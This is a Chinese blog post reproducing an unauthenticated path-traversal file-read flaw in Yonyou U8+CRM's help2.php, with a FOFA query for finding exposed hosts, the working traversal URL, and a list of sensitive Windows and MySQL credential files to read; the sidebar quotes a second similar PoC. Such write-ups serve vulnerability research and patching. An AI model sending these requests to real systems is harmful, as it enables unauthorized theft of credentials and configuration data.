用友U8CRM系统help2 任意文件读取漏洞复现

已于 2023-12-25 11:06:16 修改
阅读量545 收藏 6
点赞数 9
分类专栏: 漏洞复现 文章标签: web安全 漏洞复现 任意文件读取 用友U8
于 2023-12-23 18:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiayu729100940/article/details/135112796
版权

用友U8+CRM系统的help2文件中接口存在任意文件读取漏洞,攻击者在未登录情况下即可进行漏洞利用。

1.1 漏洞级别

高危

1.2 快速检索

fofa语法: title="用友U8CRM"

1.3 漏洞复现

该漏洞利用非常简单,只需构造get请求

访问该地址即可触发漏洞,由下图可以看来文件被成功的加载出来了。

在这里插入图片描述

1.4 进一步利用

通过上一步我们已经可以成功的访问一些敏感的配置文件了,那我们如何进一步的读取操作系统的敏感文件呢?

上文中我们可以访问php.ini文件,在该文件中搜索error_log,我们可以得到U8的实际安装路径

在这里插入图片描述

所以从我的安装路径来看

/../../apache/php.ini  等价于
c://U8SOFT/turbocrm70/apache/php.ini

因此如果我们想要获取系统文件内容,如

c://windows/system.ini

则可以构造下列相对路径:

/../../../../windows/system.ini
即构造链接:
url/pub/help2.php?key=/../../../../windows/system.ini

在这里插入图片描述可以看到文件读取成功。
这里我们需要注意的是,由于windows系统本来盘符的设定,通过相对路径的方式根本无法访问别的盘符下的内容,如果你利用的系统安装在非C盘的路径下,恭喜你 这个漏洞对你来说利用价值不大。

一些常用的敏感windows文件路径

C:\boot.ini //查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件
C:\Windows\repair\sam //存储系统初次安装的密码
C:\Program Files\mysql\my.ini //Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
C:\Windows\php.ini //php配置信息
C:\Windows\my.ini //Mysql配置信息
C:\Windows\win.ini //Windows系统的一个基本系统配置文件

这个漏洞相对来说比较简单,但是我看很多复现都没有进一步读取系统文件的解析。因此写了这个分析文章希望对大家有用~

在这里插入图片描述

fly夏天
关注
  • 9
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
用友U8 Cloud ArchiveVerify SQL注入漏洞复现(含nuclei-poc)
m0_50797689的博客
02-28 290
用友U8 Cloud ArchiveVerify SQL注入漏洞复现(含nuclei-poc)
用友GRP-U8 内控管理软件/servlet/FileUpload 任意文件上传漏洞复现
0xSec
12-23 980
用友GRP-U8内控管理软件存在任意文件(/servlet/FileUpload)上传漏洞,攻击者可通过该漏洞上传木马,远程控制服务器。
用友U8+CRM 任意文件读取漏洞复现
m0_69931798的博客
10-18 165
poc:burp 抓包 get 请求 GET /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini 替换即可。getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,本文 只复现 任意文件读取。body="用友U8CRM"
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击者可在目标系统上传任意文件执行命令。
用友U8人力资源管理系统软件介绍.pdf
11-16
用友U8人力资源管理系统软件介绍.pdf
玩转CodeQLpy之用友GRP-U8漏洞挖掘
C20220511的博客
03-09 1184
通过CodeQLpy可以辅助代码审计人员快速定位代码中的问题,目前支持对SprintBoot的jar包,SpringMVC的war包,直接下载的源码文件夹,maven项目源码等方式进行自动化代码审计,详细使用方式参考github。使用CodeQLpy可以直接从目标源码中找到上百个高危的漏洞,包括但不限于反序列化,任意文件上传,任意文件删除,SQL注入,SSRF,XSS等,如图2.2所示。利用CodeQLpy生成的数据库,结合CSV文件中保存的有结果的插件名称,可以在VS中复现漏洞查找过程。
用友GRP-U8 存在任意文件上传漏洞
holyxp的博客
07-26 1746
用友GRP-U8是面向政府及行政事业单位的财政管理应用。
【0day】复现用友CRM系统任意文件读取漏洞
记录并分享学习安全的知识点..
07-07 544
用友TurboCRM一直致力于为客户提供架构完整、功能全面、具有良好伸缩性的产品,以支持客户业务的快速变化与成长。产品信息用友TurboCRM产品线由包括支持全面客户接触的TurboCTI和用友TurboLINK,匹配多业务模式和业务管理的用友TurboKEY和用友TurboCRM,支持与ERP等软件无缝联接、整合应用的用友TurboEAI,满足业务决策和商业智能应用用友TurboDSS系统构成。用友TurboCRM存在任意文件读取漏洞
用友U8 CRM系统help2 任意文件读取漏洞(1day)
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-20 555
U8+CRM》是一款专为代理销售服务行业设计的集CRM、呼叫中心、OA核心应用于一体,提供前端营销、后端业务处理及员工管理一体化应用的管理软件。软件立足代理销售服务行业管理一体化的高度,以“整合、专业、智能、畅捷”为产品研发理念,弥补了代理销售服务行业信息化管理的空白,为其经营管理的腾飞注入了强大的力量!技术平台采用JAVA跨平台BS应用开发技架构,支持 SQL Server数据库,支持Chrome、 Firefox等各种主流浏览器应用。
用友U8+CRM 任意文件上传+读取漏洞复现
0xSec
08-13 2433
用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,攻击者通过漏洞可以获取到服务器权限。
用友OA U8 test.jsp sql注入漏洞复现
qq_44828901的博客
06-21 1382
简单验证、复现漏洞
用友U8固定资产管理子系统PPT课件
06-28
用友U8固定资产管理子系统,用友U8固定资产管理子系统课件,用友U8固定资产管理子系统PPT
用友U8系统审批流操作接口说明
02-06
1. 用友U8系统审批流操作接口说明 1.1 据是否启用了审批流 1.2 将单据提交进审批流
用友U8C合并报表2.mp4
02-16
用友U8C合并报表2.mp4
从内部防护汽车网络安全——硬件安全模块(HSM)保护ECU主处理器内部
最新发布
dianqicyuyan的博客
04-23 286
HSM是一种硬件,它以物理方式封装了安全功能。其集成芯片专为IT安全应用而设计,通常具有自己的处理器核心、各种内存(RAM、ROM、闪存等)和硬件密码加速器。此外,HSM必须满足用于车辆应用的特定标准,并且极其有效的集成对于降低成本至关重要。其主要要求包括ECU应用程序和HSM之间的安全接口,以及用于分析故障的调试/测试接口。HSM必须能够以尽可能短的等待时间处理加密信息,并能够承受汽车环境中的标准温度。从根本上说,HSM通过其自己的处理器核心来执行汽车应用场景所需的所有IT安全功能。
网络安全(黑客)—2024自学
dexi1113的博客
04-16 1716
我在这里可以很肯定地告诉你:"网络安全有很好的发展前景,前沿网络安全技术即将崛起,或者说已经崛起"。
网络安全(黑客技术)—2024自学
TDJYGC的博客
04-17 1476
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
【网络安全】常见的网路安全设备及功能作用总结
白帽黑客八哥的博客
04-22 335
一种整合多种安全功能(如防火墙、防病毒、内容过滤等)于一体的网络安全设备。
网络安全之SQL注入及防御(下篇)
weixin_70911257的博客
04-23 1188
sql注入waf绕过
用友u8 cloud 反序列化rce漏洞复现
12-05
用友U8 Cloud是一款企业级管理软件,但是近期被发现存在反序列化远程命令执行(RCE)漏洞。要复现这个漏洞,首先需要一个能够触发反序列化的点,比如一个可控制的对象。接下来,我们可以构造一个恶意的序列化数据,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值